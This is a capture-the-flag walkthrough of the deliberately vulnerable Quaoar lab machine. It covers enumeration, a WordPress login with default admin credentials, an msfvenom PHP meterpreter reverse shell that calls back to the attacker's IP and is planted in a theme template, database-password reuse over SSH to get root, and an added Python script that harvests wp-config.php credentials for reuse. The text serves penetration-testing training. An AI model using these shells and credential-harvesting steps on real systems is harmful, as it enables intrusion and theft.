Quaoar

According to the information from the maker there are three flags to capture: "1. Get a shell 2. Get root access 3. There is a post exploitation flag on the box." The difficulty of this machine is set to easy. Let's have a go at it.

The first thing to do is to enumerate. Let's bring up nmap and scan this machine.

nmap -sS -T4 10.198.117.225

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-04-11 09:40 PDT
Nmap scan report for 10.198.117.225
Host is up (0.00055s latency).
Not shown: 991 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
993/tcp open  imaps
995/tcp open  pop3s
MAC Address: F4:0F:24:22:70:03 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 10.19 seconds

We can see that good 'ole port 80 is open, as is port 22. There are many others like POP3 and IMAP, but we'll start with the easiest ones. Going to the hosted site we see an image of a planet (or a moon, whichever you deem fit).


The page source shows no clues, so let's click the image; we are taken to another image:

Again, viewing the source of the page shows no other clues. So let's enumerate even further; back to our terminal. Let's use nikto to investigate the website:

nikto -h 10.198.117.225
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.198.117.225
+ Target Hostname:    10.198.117.225
+ Target Port:        80
+ Start Time:         2017-04-11 09:40:54 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 133975, size: 100, mtime: Sun Oct 23 21:00:10 2016
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wordpress/: A Wordpress installation was found.
+ 8348 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2017-04-11 09:41:08 (GMT-7) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested


What we can see is that the site is served by Apache 2.2.22 with PHP 5.3.10, both outdated, and that robots.txt points to a WordPress install under /wordpress/. We'll enumerate that WordPress with wpscan, including its users:

wpscan -u 10.198.117.225/wordpress --enumerate u
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.1
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://10.198.117.225/wordpress/
[+] Started: Tue Apr 11 09:42:43 2017

[!] The WordPress 'http://10.198.117.225/wordpress/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache/2.2.22 (Ubuntu)
[+] Interesting header: X-POWERED-BY: PHP/5.3.10-1ubuntu3
[+] XML-RPC Interface available under: http://10.198.117.225/wordpress/xmlrpc.php
[!] Upload directory has directory listing enabled: http://10.198.117.225/wordpress/wp-content/uploads/
[!] Includes directory has directory listing enabled: http://10.198.117.225/wordpress/wp-includes/

[+] WordPress version 3.9.14 identified from advanced fingerprinting (Released on 2016-09-07)
[!] 8 vulnerabilities identified from the version number

[!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
    Reference: https://wpvulndb.com/vulnerabilities/8716
    Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
    Reference: https://wpvulndb.com/vulnerabilities/8718
    Reference: https://www.mehmetince.net/low-severity-wordpress/
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
[i] Fixed in: 3.9.15

[!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
    Reference: https://wpvulndb.com/vulnerabilities/8719
    Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
[i] Fixed in: 3.9.15

[!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
    Reference: https://wpvulndb.com/vulnerabilities/8720
    Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
    Reference: https://wpvulndb.com/vulnerabilities/8721
    Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
[i] Fixed in: 3.9.15

[!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8730
    Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
    Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
[i] Fixed in: 3.9.16

[!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
    Reference: https://wpvulndb.com/vulnerabilities/8765
    Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
    Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
    Reference: http://seclists.org/oss-sec/2017/q1/563
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
[i] Fixed in: 3.9.17

[!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
    Reference: https://wpvulndb.com/vulnerabilities/8766
    Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
    Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
[i] Fixed in: 3.9.17

[+] WordPress theme in use: twentyfourteen - v1.1

[+] Name: twentyfourteen - v1.1
|  Location: http://10.198.117.225/wordpress/wp-content/themes/twentyfourteen/
[!] The version is out of date, the latest version is 1.9
|  Style URL: http://10.198.117.225/wordpress/wp-content/themes/twentyfourteen/style.css
|  Referenced style.css: wp-content/themes/twentyfourteen/style.css
|  Theme Name: Twenty Fourteen
|  Theme URI: http://wordpress.org/themes/twentyfourteen
|  Description: In 2014, our default theme lets you create a responsive magazine website with a sleek, modern des...
|  Author: the WordPress team
|  Author URI: http://wordpress.org/

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Enumerating usernames ...
[+] Identified the following 2 user/s:
    +----+--------+--------+
    | Id | Login  | Name   |
    +----+--------+--------+
    | 1  | admin  | admin  |
    | 2  | wpuser | wpuser |
    +----+--------+--------+
[!] Default first WordPress username 'admin' is still used

[+] Finished: Tue Apr 11 09:43:46 2017
[+] Requests Done: 55
[+] Memory used: 9.555 MB
[+] Elapsed time: 00:01:03


The user enumeration shows that the default admin user is still present, alongside wpuser. So let's go ahead and go to /wordpress.


Scrolling down we can see the login link:

Trying the default credentials, user admin with password admin, logs us straight into the WordPress dashboard.

As I've demonstrated before in my other write-ups, we can use a PHP shell to gain access. With admin rights in the dashboard we can go to the Appearance tab, open the theme editor and edit the theme's 404 template, since whatever we put there is executed server-side by PHP. But first we need to create our shell, and I'll use msfvenom for that.

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.95.6.200 LPORT=4444 -f raw > /root/Desktop/shell.php
[*] exec: msfvenom -p php/meterpreter/reverse_tcp LHOST=10.95.6.200 LPORT=4444 -f raw > /root/Desktop/shell.php

No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 947 bytes


I'll be using a meterpreter session over reverse TCP inside the PHP shell. LHOST and LPORT point at my attack machine, and -f raw writes the payload as plain PHP source rather than an executable. In this case I'm writing it to my desktop. Next I open the file in a text editor and paste its contents into the WordPress 404 template editor.

Before we save the 404 page, let's open up Metasploit and make sure a handler is listening on that port: exploit/multi/handler with the payload set to php/meterpreter/reverse_tcp, as shown below:

msf exploit(handler) > set LHOST 10.95.6.200
LHOST => 10.95.6.200
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.95.6.200      yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


Now we save the 404 template and browse to any non-existent page under /wordpress/ so that it renders, while watching the Metasploit listener.

msf exploit(handler) > exploit

[*] Started reverse TCP handler on 10.95.6.200:4444
[*] Starting the payload handler...
[*] Sending stage (33721 bytes) to 10.198.117.225
[*] Meterpreter session 1 opened (10.95.6.200:4444 -> 10.198.117.225:47523) at 2017-04-11 09:56:03 -0700

meterpreter >


Sweet, now let's go ahead and explore!

meterpreter > ls
Listing: /var/www/wordpress
===========================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  418    fil   2016-10-26 17:45:26 -0700  index.php
100644/rw-r--r--  19930  fil   2016-10-26 17:45:26 -0700  license.txt
100644/rw-r--r--  7195   fil   2016-10-26 17:45:26 -0700  readme.html
100644/rw-r--r--  4896   fil   2016-10-26 17:45:26 -0700  wp-activate.php
40755/rwxr-xr-x   4096   dir   2016-10-26 17:45:26 -0700  wp-admin
100644/rw-r--r--  271    fil   2016-10-26 17:45:26 -0700  wp-blog-header.php
100644/rw-r--r--  4818   fil   2016-10-26 17:45:26 -0700  wp-comments-post.php
100644/rw-r--r--  3087   fil   2016-10-26 17:45:26 -0700  wp-config-sample.php
100666/rw-rw-rw-  3441   fil   2016-11-29 21:02:01 -0800  wp-config.php
40755/rwxr-xr-x   4096   dir   2016-10-26 17:45:26 -0700  wp-content
100644/rw-r--r--  2932   fil   2016-10-26 17:45:26 -0700  wp-cron.php
40755/rwxr-xr-x   4096   dir   2016-10-26 17:45:26 -0700  wp-includes
100644/rw-r--r--  2380   fil   2016-10-26 17:45:26 -0700  wp-links-opml.php
100644/rw-r--r--  2359   fil   2016-10-26 17:45:26 -0700  wp-load.php
100644/rw-r--r--  33609  fil   2016-10-26 17:45:26 -0700  wp-login.php
100644/rw-r--r--  8235   fil   2016-10-26 17:45:26 -0700  wp-mail.php
100644/rw-r--r--  11070  fil   2016-10-26 17:45:26 -0700  wp-settings.php
100644/rw-r--r--  25665  fil   2016-10-26 17:45:26 -0700  wp-signup.php
100644/rw-r--r--  4026   fil   2016-10-26 17:45:26 -0700  wp-trackback.php
100644/rw-r--r--  3032   fil   2016-10-26 17:45:26 -0700  xmlrpc.php


So I went to town exploring the depths of this server, and only later noticed that what I needed was in front of me the whole time. But I did find a flag in this directory:

meterpreter > cd home
meterpreter > ls
Listing: /home
==============

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40755/rwxr-xr-x  4096  dir   2016-10-22 09:53:38 -0700  wpadmin

meterpreter > cat wpadmin
[-] wpadmin is a directory
meterpreter > cd wpadmin
meterpreter > ls
Listing: /home/wpadmin
======================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100644/rw-r--r--  33    fil   2016-10-22 09:54:00 -0700  flag.txt

meterpreter > cat flag.txt
2bafe61f03117ac66a73c3c514de796e


Sweet, but we still haven't gotten root access, so there is more to find. Remember what I said about it being in front of me the whole time? Let's go back to the beginning of the meterpreter session. In the first directory there is a wp-config.php file, where WordPress stores its database username and password. Note from the listing above that it is mode 666 (rw-rw-rw-), so any local account can read or modify it, not just the web server. Let's take a look!

meterpreter > cat wp-config.php
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, WordPress Language, and ABSPATH. You can find more information
* by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
* wp-config.php} Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wordpress');

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');

/** MySQL hostname */
define('DB_HOST', 'localhost');

/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');

/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/** */
define('WP_HOME','/wordpress/');
define('WP_SITEURL','/wordpress/');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY',         '`47hAs4ic+mLDn[-PH(7t+Q+J)L=8^ 8&z!F ?Tu4H#JlV7Ht4}Fsdbg2us1wZZc');
define('SECURE_AUTH_KEY',  'g#vFXk!k|3,w30.VByn8+D-}-P(]c1oI|&BfmQqq{)5w)B>$?5t}5u&s)#K1@{%d');
define('LOGGED_IN_KEY',    '[|;!?pt}0$ei+>sS9x+B&$iV~N+3Cox-C5zT|,P-<0YsX6-RjNA[WTz-?@<F[O@T');
define('NONCE_KEY',        '7RFLj2-NFkAjb6UsKvnN+1aj<Vm++P9<D~H+)l;|5?P1*?gi%o1&zKaXa<]Ft#++');
define('AUTH_SALT',        'PN9aE9`#7.uL|W8}pGsW$,:h=Af(3h52O!w#IWa|u4zfouV @J@Y_GoC8)ApSKeN');
define('SECURE_AUTH_SALT', 'wGh|W wNR-(p6fRjV?wb$=f4*KkMM<j0)H#Qz-tu.r~2O*Xs9W3^_`c6Md+ptRR.');
define('LOGGED_IN_SALT',   '+36M1E5.MC;-k:[[_bs>~a0o_c$v?ok4LR|17 ]!K:Z8-]lcSs?EXC`TO;X3in[#');
define('NONCE_SALT',       'K=Sf5{EDu3rG&x=#em=R}:-m+IRNs<@4e8P*)GF#+x+,zu.D8Ksy?j+_]/Kcn|cn');

/**#@-*/

/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each a unique
* prefix. Only numbers, letters, and underscores please!
*/
$table_prefix  = 'wp_';

/**
* WordPress Localized Language, defaults to English.
*
* Change this to localize WordPress. A corresponding MO file for the chosen
* language must be installed to wp-content/languages. For example, install
* de_DE.mo to wp-content/languages and set WPLANG to 'de_DE' to enable German
* language support.
*/
define('WPLANG', '');

/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*/
define('WP_DEBUG', false);

/* That's all, stop editing! Happy blogging. */

/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
     define('ABSPATH', dirname(__FILE__) . '/');

/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');

Excellent, we have credentials for the database root user:
/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
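Pulling the interesting values out of a wp-config.php by eye works for one box, but the same file is worth parsing properly during post-exploitation. The following is an added example written for this page, not code from the original write-up: it extracts every string-valued define() from a wp-config.php, skipping commented-out lines and handling PHP single- and double-quoted string escapes (the AUTH_* salts routinely contain quotes, backticks and backslashes that break a naive regex), and then returns the MySQL settings together with the user/password pair to try against other services. The sample config at the bottom is constructed for offline testing; it reuses the DB values shown above but the salt values are made up.

```python
#!/usr/bin/env python3
# Added example (not from the original write-up): harvest define() settings
# from a wp-config.php. Only string values are parsed; booleans and numbers
# (e.g. WP_DEBUG) are deliberately left out.
import re

# define('NAME', 'value') / define("NAME", "value"); the value alternation
# consumes escaped characters as pairs so an escaped quote does not end it.
_DEFINE = re.compile(
    r"""define\s*\(\s*(['"])(?P<name>[A-Za-z_][A-Za-z0-9_]*)\1\s*,\s*"""
    r"""(?P<q>['"])(?P<raw>(?:\\.|(?!(?P=q)).)*)(?P=q)\s*\)""",
    re.S,
)

_DOUBLE_ESCAPES = {"n": "\n", "t": "\t", "r": "\r", "\\": "\\", '"': '"', "$": "$"}


def _unescape(raw, quote):
    """Decode PHP string escapes: single-quoted only knows \\\\ and \\', double-
    quoted knows the usual C-style set (others are kept literally, as PHP does)."""
    out, i = [], 0
    while i < len(raw):
        c = raw[i]
        if c == "\\" and i + 1 < len(raw):
            nxt = raw[i + 1]
            if quote == "'" and nxt in "\\'":
                out.append(nxt)
                i += 2
                continue
            if quote == '"' and nxt in _DOUBLE_ESCAPES:
                out.append(_DOUBLE_ESCAPES[nxt])
                i += 2
                continue
        out.append(c)
        i += 1
    return "".join(out)


def _commented_out(text, pos):
    """True if the define() at pos sits on a line that starts with a comment."""
    line_start = text.rfind("\n", 0, pos) + 1
    prefix = text[line_start:pos].lstrip()
    return prefix.startswith(("//", "#", "*", "/*"))


def parse_wp_config(text):
    """Return {CONSTANT: value} for every live, string-valued define()."""
    return {
        m.group("name"): _unescape(m.group("raw"), m.group("q"))
        for m in _DEFINE.finditer(text)
        if not _commented_out(text, m.start())
    }


def db_credentials(cfg):
    """MySQL settings plus the (user, password) pair worth trying on SSH etc."""
    user, password = cfg.get("DB_USER"), cfg.get("DB_PASSWORD")
    return {
        "host": cfg.get("DB_HOST", "localhost"),
        "database": cfg.get("DB_NAME"),
        "user": user,
        "password": password,
        "reuse_pair": (user, password) if user and password else None,
    }


# Constructed sample (DB values as on the box above, salts invented) with the
# awkward cases: a commented-out define, escaped quotes, an empty value.
SAMPLE_WP_CONFIG = r"""<?php
/** MySQL settings */
define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'rootpassword!');
define('DB_HOST', 'localhost');
define('DB_COLLATE', '');
// define('DB_PASSWORD', 'old-commented-out');
define('AUTH_KEY',  'it\'s got a \\ backslash and "quotes"');
define("NONCE_SALT", "dollar\$sign\ttab");
define('WP_DEBUG', false);
$table_prefix  = 'wp_';
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_WP_CONFIG
    cfg = parse_wp_config(text)
    for name, value in cfg.items():
        print(f"{name} = {value!r}")
    print("credentials:", db_credentials(cfg))
```

Run it with the path of a wp-config.php pulled from a target, or with no arguments to see it work on the built-in sample.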

So let's try using these somewhere, but where exactly? The most obvious place is a MySQL login, but that didn't work. Passwords are frequently reused across services, so let's try the same pair over SSH, which the nmap scan showed open on port 22.

ssh root@10.198.117.225
The authenticity of host '10.198.117.225 (10.198.117.225)' can't be established.
ECDSA key fingerprint is SHA256:+ODdJgfptUyyVzKI9wDm804SlXxzmb4/BiKsHCnHGeg.
Are you sure you want to continue connecting (yes/no)? y
Please type 'yes' or 'no': yes
Warning: Permanently added '10.198.117.225' (ECDSA) to the list of known hosts.
root@10.198.117.225's password:
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

* Documentation:  https://help.ubuntu.com/

  System information as of Mon Apr 10 21:19:10 EDT 2017

  System load:  0.0               Processes:             98
  Usage of /:   29.9% of 7.21GB   Users logged in:       0
  Memory usage: 37%               IP address for eth0:   10.198.117.225
  Swap usage:   0%                IP address for virbr0: 192.168.122.1

  Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Jan 15 11:23:45 2017 from desktop-g0lhb7o.snolet.com
root@Quaoar:~#


Well, what do ya know, it works! Let's go ahead and find the root flag.

root@Quaoar:~# ls
flag.txt  vmware-tools-distrib
root@Quaoar:~# cat flag.txt
8e3f9ec016e3598c5eec11fd3d73f6fb

Oh well, there you go, pretty simple really.
This machine is definitely geared toward beginners; it does make you think a bit, but it is worth the time to find the flags.